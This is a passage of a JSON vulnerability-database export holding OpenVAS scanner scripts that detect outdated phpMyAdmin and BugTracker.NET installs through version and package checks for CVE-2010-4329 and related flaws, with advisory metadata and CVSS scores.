script_cve_id(\"CVE-2010-3266\", \"CVE-2010-3267\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"BugTracker.NET Cross-Site Scripting and SQL Injection Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/42418\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/15653/\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/archive/1/514957/100/0/threaded\");\n script_xref(name : \"URL\" , value : \"http://www.coresecurity.com/content/multiple-vulnerabilities-in-bugtracker\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_bugtracker_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\n## Get BugTracker Port\nport = get_http_port(default:80);\nif(!port){\n exit(0);\n}\n\n## Check for BugTracker.NET version prior to 3.4.5\nif(ver = get_version_from_kb(port:port,app:\"btnet\"))\n{\n if(version_is_less(version:ver, test_version: \"3.4.5\")){\n security_message(port:port);\n }\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:28", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2011-01-24T00:00:00", "type": "openvas", "title": "FreeBSD Ports: phpMyAdmin", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4329"], "modified": "2019-03-14T00:00:00", "id": "OPENVAS:136141256231068698", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231068698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_phpMyAdmin22.nasl 14170 2019-03-14 09:24:12Z cfischer $\n#\n# Auto generated from VID 753f8185-5ba9-42a4-be02-3f55ee580093\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.68698\");\n script_version(\"$Revision: 14170 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 10:24:12 +0100 (Thu, 14 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-24 17:55:59 +0100 (Mon, 24 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2010-4329\");\n script_name(\"FreeBSD Ports: phpMyAdmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following packages are affected:\n\n phpMyAdmin\n phpMyAdmin211\n\nCVE-2010-4329\nCross-site scripting (XSS) vulnerability in the PMA_linkOrButton\nfunction in libraries/common.lib.php in the database (db) search\nscript in phpMyAdmin 2.11.x before 2.11.11.1 and 3.x before 3.3.8.1\nallows remote attackers to inject arbitrary web script or HTML via a\ncrafted request.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-8.php\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/753f8185-5ba9-42a4-be02-3f55ee580093.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"phpMyAdmin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.3.8.1\")<0) {\n txt += 'Package phpMyAdmin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"phpMyAdmin211\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.11.11.1\")<0) {\n txt += 'Package phpMyAdmin211 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-12-20T13:17:56", "description": "Check for the Version of phpMyAdmin", "cvss3": {}, "published": "2010-12-23T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2010-18371", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4329"], "modified": "2017-12-19T00:00:00", "id": "OPENVAS:862709", "href": "http://plugins.openvas.org/nasl.php?oid=862709", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2010-18371\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"phpMyAdmin on Fedora 13\";\ntag_insight = \"phpMyAdmin is a tool written in PHP intended to handle the administration of\n MySQL over the Web. Currently it can create and drop databases,\n create/drop/alter tables, delete/edit/add fields, execute any SQL statement,\n manage keys on fields, manage privileges, export data into various formats and\n is available in over 55 languages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-December/051956.html\");\n script_id(862709);\n script_version(\"$Revision: 8164 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 07:30:41 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-23 07:38:58 +0100 (Thu, 23 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2010-18371\");\n script_cve_id(\"CVE-2010-4329\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2010-18371\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of phpMyAdmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.3.8.1~1.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-12-14T11:48:40", "description": "Check for the Version of phpmyadmin", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "Mandriva Update for phpmyadmin MDVSA-2010:244 (phpmyadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4329"], "modified": "2017-12-14T00:00:00", "id": "OPENVAS:831269", "href": "http://plugins.openvas.org/nasl.php?oid=831269", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for phpmyadmin MDVSA-2010:244 (phpmyadmin)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in phpmyadmin:\n\n It was possible to conduct a XSS attack using spoofed request on the\n db search script (CVE-2010-4329).\n \n This upgrade provides the latest phpmyadmin versions which is not\n vulnerable to this security issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpmyadmin on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-11/msg00045.php\");\n script_id(831269);\n script_version(\"$Revision: 8109 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-14 07:31:15 +0100 (Thu, 14 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_xref(name: \"MDVSA\", value: \"2010:244\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2010-4329\");\n script_name(\"Mandriva Update for phpmyadmin MDVSA-2010:244 (phpmyadmin)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of phpmyadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpmyadmin\", rpm:\"phpmyadmin~3.3.8.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-17T11:05:25", "description": "Check for the Version of phpMyAdmin", "cvss3": {}, "published": "2010-12-23T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2010-18371", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4329"], "modified": "2018-01-16T00:00:00", "id": "OPENVAS:1361412562310862709", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862709", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2010-18371\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"phpMyAdmin on Fedora 13\";\ntag_insight = \"phpMyAdmin is a tool written in PHP intended to handle the administration of\n MySQL over the Web. Currently it can create and drop databases,\n create/drop/alter tables, delete/edit/add fields, execute any SQL statement,\n manage keys on fields, manage privileges, export data into various formats and\n is available in over 55 languages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-December/051956.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862709\");\n script_version(\"$Revision: 8438 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-16 18:38:23 +0100 (Tue, 16 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-23 07:38:58 +0100 (Thu, 23 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2010-18371\");\n script_cve_id(\"CVE-2010-4329\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2010-18371\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of phpMyAdmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.3.8.1~1.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-02T10:54:26", "description": "Check for the Version of phpmyadmin", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "Mandriva Update for phpmyadmin MDVSA-2010:244 (phpmyadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4329"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:1361412562310831269", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831269", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for phpmyadmin MDVSA-2010:244 (phpmyadmin)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in phpmyadmin:\n\n It was possible to conduct a XSS attack using spoofed request on the\n db search script (CVE-2010-4329).\n \n This upgrade provides the latest phpmyadmin versions which is not\n vulnerable to this security issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpmyadmin on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-11/msg00045.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831269\");\n script_version(\"$Revision: 8254 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 08:29:05 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_xref(name: \"MDVSA\", value: \"2010:244\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2010-4329\");\n script_name(\"Mandriva Update for phpmyadmin MDVSA-2010:244 (phpmyadmin)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of phpmyadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpmyadmin\", rpm:\"phpmyadmin~3.3.8.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:40:09", "description": "phpMyAdmin is prone to a cross-site scripting vulnerability because it\n fails to sufficiently sanitize user-supplied data.", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "phpMyAdmin Database Search Cross Site Scripting Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4329"], "modified": "2019-03-01T00:00:00", "id": "OPENVAS:1361412562310100939", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100939", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_45100.nasl 13960 2019-03-01 13:18:27Z cfischer $\n#\n# phpMyAdmin Database Search Cross Site Scripting Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100939\");\n script_version(\"$Revision: 13960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-01 14:18:27 +0100 (Fri, 01 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 13:44:03 +0100 (Thu, 09 Dec 2010)\");\n script_bugtraq_id(45100);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2010-4329\");\n script_name(\"phpMyAdmin Database Search Cross Site Scripting Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\");\n\n script_xref(name:\"URL\", value:\"https://www.securityfocus.com/bid/45100\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-8.php\");\n\n script_tag(name:\"impact\", value:\"An attacker may leverage this issue to execute arbitrary script code\n in the browser of an unsuspecting user in the context of the affected\n site. This may allow the attacker to steal cookie-based authentication\n credentials and to launch other attacks.\");\n script_tag(name:\"affected\", value:\"Versions prior to phpMyAdmin 3.3.8.1 and 2.11.11.1 are vulnerable.\");\n script_tag(name:\"solution\", value:\"Vendor updates are available. Please see the references for more\n information.\");\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a cross-site scripting vulnerability because it\n fails to sufficiently sanitize user-supplied data.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_in_range( version:vers, test_version:\"3\", test_version2:\"3.3.8.0\" ) ||\n version_in_range( version:vers, test_version:\"2.11\", test_version2:\"2.11.11.0\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"2.11.11.1/3.3.8.1\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2018-01-25T10:54:59", "description": "Check for the Version of phpMyAdmin", "cvss3": {}, "published": "2010-12-23T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2010-18343", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4329"], "modified": "2018-01-24T00:00:00", "id": "OPENVAS:1361412562310862716", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862716", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2010-18343\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"phpMyAdmin on Fedora 14\";\ntag_insight = \"phpMyAdmin is a tool written in PHP intended to handle the administration of\n MySQL over the Web. Currently it can create and drop databases,\n create/drop/alter tables, delete/edit/add fields, execute any SQL statement,\n manage keys on fields, manage privileges, export data into various formats and\n is available in over 55 languages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-December/051942.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862716\");\n script_version(\"$Revision: 8510 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 08:57:42 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-23 07:38:58 +0100 (Thu, 23 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2010-18343\");\n script_cve_id(\"CVE-2010-4329\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2010-18343\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of phpMyAdmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.3.8.1~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-02T10:54:17", "description": "Check for the Version of phpMyAdmin", "cvss3": {}, "published": "2010-12-23T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2010-18343", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4329"], "modified": "2017-12-25T00:00:00", "id": "OPENVAS:862716", "href": "http://plugins.openvas.org/nasl.php?oid=862716", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2010-18343\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"phpMyAdmin on Fedora 14\";\ntag_insight = \"phpMyAdmin is a tool written in PHP intended to handle the administration of\n MySQL over the Web. Currently it can create and drop databases,\n create/drop/alter tables, delete/edit/add fields, execute any SQL statement,\n manage keys on fields, manage privileges, export data into various formats and\n is available in over 55 languages.\";\ntag_solution = \"Please Install the Updated 